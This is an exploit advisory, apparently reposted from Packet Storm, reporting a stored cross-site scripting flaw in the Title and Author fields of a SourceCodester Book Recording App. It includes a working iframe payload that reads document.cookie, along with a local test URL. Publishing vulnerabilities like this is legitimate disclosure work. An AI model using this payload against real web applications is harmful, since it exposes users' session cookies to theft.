Book Recording App 2024-09-24 Cross Site Scripting
2024-10-7 21:47:41 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

# Exploit Title: Book Recording App - Cross Site Scripting (Stored XSS)
# Date: 05/10/2024
# Exploit Author: Arif Ari
# Vendor Homepage: https://www.sourcecodester.com/javascript/17600/book-recording-app-using-htmlcss-vanillajs-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=17600&title=Book+Recording+App+using+HTML%26CSS+in+VanillaJS+with+Source+Code
# Tested on: Windows / XAMPP

# Title and Author parameters is vulnerable to stored xss. You can vulnerability this xss payload:
# <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

####### Raw URL #######

# http://localhost/book-recording-app-using-html-css-in-vanillajs/#


文章来源: https://packetstormsecurity.com/files/182024/bra20240924-xss.txt
如有侵权请联系:admin#unsafe.sh